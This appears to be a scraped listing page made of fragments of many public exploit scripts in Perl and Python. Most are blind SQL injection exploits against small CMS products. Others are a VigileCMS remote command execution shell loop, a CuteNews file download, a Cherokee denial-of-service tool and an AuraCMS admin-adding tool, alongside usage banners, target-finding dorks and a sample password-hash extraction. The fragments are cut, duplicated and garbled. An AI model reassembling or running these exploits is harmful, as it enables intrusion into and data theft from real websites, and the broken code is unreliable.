Next Page >>
print
$request->header(cookie => $cookie);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[**] Clan Tiger CMS - BLIND SQL Injection Exploit\n";
print "\t[??] USAGE MODE: [??]\n";
print "\t[**] perl $0 [HOST] [PATH] [uid] [code] [slug] [id] [DB_PREFIX]\n";
print "\t[**] [HOST]: Web attacked.\n";
print "\t[**] [PATH]: Home Path.\n";
print "\t[**] [uid]: The CCC_UID cookie.\n";
my $request = HTTP::Request -> new(GET => $_[0]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[###] TemaTres CMS v1.0.3 - (BLIND SQL Injection) Exploit\n";
print "\t[###] USAGE MODE: [###]\n";
print "\t[###] perl $0 [HOST] [PATH] [DBPREFIX] [Id]\n";
print "\t[###] [HOST]: Web.\n";
print "\t[###] [PATH]: Home Path.\n";
print "\t[###] [DBPREFIX]: Database Prefix. Default: lc_ (**optional)\n";
#
# ...
#
# if (eregi(" AND | NOT | OR ",$search,$matches)) $search=str_replace($matches,'',$search); <-------BYPASSED (/**/)
#
# $keywords = explode(' ', $search); //print_r($keywords); <---------BYPASSED (/**/)
#
# ...
#
# $query = "SELECT * FROM ".db('prefix')."content WHERE published='1' AND"; <----------START QUERY
#
$request->header(cookie => $_[0]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[XxX] WysGui CMS 1.2 BETA - BLIND SQL Injection Exploit\n";
print "\t[XxX] USAGE MODE: [XxX]\n";
print "\t[XxX] perl $0 [HOST] [PATH] [id]\n";
print "\t[XxX] [HOST]: Web.\n";
print "\t[XxX] [PATH]: Home Path.\n";
print "\t[XxX] [id]: Id user. Default: 1 (**optional)\n";
os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
os.system ("color 02")
else:
os.system("clear")
print "\t#######################################################\n\n"
print "\t#######################################################\n\n"
print "\t## AlumniServer v-1.0.1 Blind SQLi Exploit ##\n\n"
print "\t## ++Conditions: magic_quotes=OFF ##\n\n"
print "\t## ++Needed: Valid mail ##\n\n"
print "\t## Author: Y3nh4ck3r ##\n\n"
$request->content($_[1]);
}else{
$request = HTTP::Request -> new(GET => $_[0]);
}
my $outcode= $userag->request($request)->as_string;
#print $outcode; #--> Active this line for debugger mode
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
print "\t--->Maybe:\n\n";
print "\t\t1.-Patched or magic_quotes_gpc=ON.\n";
print "\t\t2.-User doesn't exist.\n";
print "\t\t3.-Error in captcha code or image.\n";
$request = HTTP::Request -> new(POST => $_[0]);
$request->referer($_[0]);
$request->content_type('application/x-www-form-urlencoded');
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
#print $outcode; #--> Active this line for debugger mode
#print $request->as_string; #--> Active this line for debugger mode
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
os.system("cls")
os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit")
os.system ("color 02")
else:
os.system("clear")
print "\t#######################################################\n\n"
print "\t#######################################################\n\n"
print "\t## FretsWeb 1.2 Blind SQL Injection Exploit ##\n\n"
print "\t## ++Conditions: magic_quotes=OFF ##\n\n"
print "\t## ++Needed: Valid name ##\n\n"
print "\t## Author: Y3nh4ck3r ##\n\n"
sub request {
my $userag = LWP::UserAgent->new;
$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$request = HTTP::Request -> new(GET => $_[0]);
my $outcode= $userag->request($request)->as_string;
#print $outcode; #--> Active this line for debugger mode
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
$request = HTTP::Request -> new(POST => $_[0]);
$request->referer($_[0]);
$request->content_type('application/x-www-form-urlencoded');
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
#print $outcode; #--> Active this line for debugger mode
#print $request->as_string; #--> Active this line for debugger mode
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
os.system("cls")
os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit")
os.system ("color 02")
else:
os.sytem("clear")
print "\t#######################################################\n\n"
print "\t#######################################################\n\n"
print "\t## FretsWeb 1.2 Blind SQL Injection Exploit ##\n\n"
print "\t## ++Conditions: magic_quotes=OFF ##\n\n"
print "\t## ++Needed: Valid name ##\n\n"
print "\t## Author: Y3nh4ck3r ##\n\n"
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[!-!] Family Connections <= v1.9 (GET var 'member') BLIND SQLi Exploit\n";
print "\t[!-!] USAGE MODE: [!-!]\n";
print "\t[!-!] perl $0 [HOST] [PATH] [your-user] [your-pass] [your-id]\n";
print "\t[!-!] [HOST]: Web.\n";
print "\t[!-!] [PATH]: Home Path. Not use path= no-path\n";
print "\t[!-!] [your-user]: Your username.\n";
Use your brain, do not lame. Enjoy. =)
'''
#Python exploit starts:
import sys, httplib, urllib
print ""
if len(sys.argv)<=1:
print "################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
#-->RELEASED: 2009-01-25
#
#CMS VULNERABILITY:
#
#-->TESTED ON: firefox 3
#-->DORK: inurl:"printable_pedigree.php"
#-->CATEGORY: BLIND SQL INJECTION EXPLOIT
#-->AFFECT VERSION: <= 1.0.1 Beta
#-->Discovered Bug date: 2009-05-08
#-->Reported Bug date: 2009-05-08
#-->Fixed bug date: 2009-05-12
}
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
print "\t--->Maybe:\n\n";
print "\t\t1.-Patched.\n";
print "\t\t2.-Bad path or host.\n";
print "\t\tEXPLOIT FAILED!\n";
> }
> my $outcode= $userag->request($request)->as_string;
> return $outcode;
> }
> sub error {
> print "\t------------------------------------------------------------\n";
> print "\tWeb isn't vulnerable!\n\n";
> print "\t--->Maybe:\n\n";
> print "\t\t1.-Patched.\n";
> print "\t\t2.-Bad path or host.\n";
> print "\t\tEXPLOIT FAILED!\n";
> }
> my $outcode= $userag->request($request)->as_string;
> return $outcode;
> }
> sub error {
> print "\t------------------------------------------------------------\n";
> print "\tWeb isn't vulnerable!\n\n";
> print "\t--->Maybe:\n\n";
> print "\t\t1.-Patched.\n";
> print "\t\t2.-Bad path or host.\n";
> print "\t\tEXPLOIT FAILED!\n";
$target=@t[0];
if(index($target,"/",length($target)-1)==-1){
$target=$target.'/';
}
if($e!=1){
print "\nExample:\n";
print "\nbrooks@TheLab:~/code/exploits\$ ./smf_blind_sql.pl -p -u admin -t http://127.0.0.1/smf_1-1-3/index.php -n 4 -c SMFCookie218=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A40%3A%22091feddbd31bfa96932a5e4e6c34cb36f2686c1a%22%3Bi%3A2%3Bi%3A1378168836%3Bi%3A3%3Bi%3A1%3B%7D
\n\nSMF Is Vulnerable!
Finding Password Hash for the Name: 'admin'
Please Standby...
while( $this->cmd_prompt() )
{
$this->web->addheader('My-Code', $this->cmd);
$this->web->get($this->p_url);
print "\n".$this->get_answer();
}
exit(0);
}
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[XxX] microTopic v1 Initial Release (POST var 'rating') BLIND SQL Injection Exploit\n";
print "\t[XxX] USAGE MODE: [XxX]\n";
print "\t[XxX] perl $0 [HOST] [PATH] [topic]\n";
print "\t[XxX] [HOST]: Web.\n";
print "\t[XxX] [PATH]: Home Path. Not path: no-path\n";
print "\t[XxX] [topic]: Valid topic. Opt: 1,2,3,4\n";
my $request = HTTP::Request -> new(GET => $_[0]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[XxX] RTWebalbum v1.0.462 (GET var 'AlbumID') BLIND SQL Injection Exploit\n";
print "\t[XxX] USAGE MODE: [XxX]\n";
print "\t[XxX] perl $0 [HOST] [PATH] [AlbumID]\n";
print "\t[XxX] [HOST]: Web.\n";
print "\t[XxX] [PATH]: Home Path. Not path: no-path\n";
print "\t[XxX] [AlbumID]: Valid AlbumID.\n";
#CuteNews 2.6 ( module file.php )
#Gr33tz-TeaM
#Dork : inurl:/cutenews/file.php
use LWP::UserAgent;
if(@ARGV!=2){
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10);
binmode $server;
print "Waiting for connections on port 5050 TCP...\n";
while (my $browser = $server->accept()) { #When a connection occure...
binmode $browser;
my $method="";
my $content_length = 0;
#!/usr/bin/perl
#Found by Pr0metheuS
#Coded by Pr0metheuS
#Gr33tz-Team
#Dork : intitle:"CCMS v3.1 Demo PW"
print "______________________________________\n";
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n";
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n";
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n";
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n";
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n";
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
#Python exploit starts:
#Version 2 of this exploit. Not the one published on some sites.
import sys, httplib, urllib
print "\n################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
print "+ Company [Xc0re Security Research Group] +\n";
print "+ DATE: [25/10/09] +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
use LWP::UserAgent;
use Getopt::Long;
no warnings;
if(!$ARGV[1]) {
print "\n |--------------------------------------------------|";
print "\n | Indonesian Newhack Technology |";
print "\n |--------------------------------------------------|";
print "\n | AuraCMS <= 2.2.1 (user.php) |";
print "\n | 1.Security Code Bypass |";
print "\n | 2.Add Administrator |";
Next Page>>
|
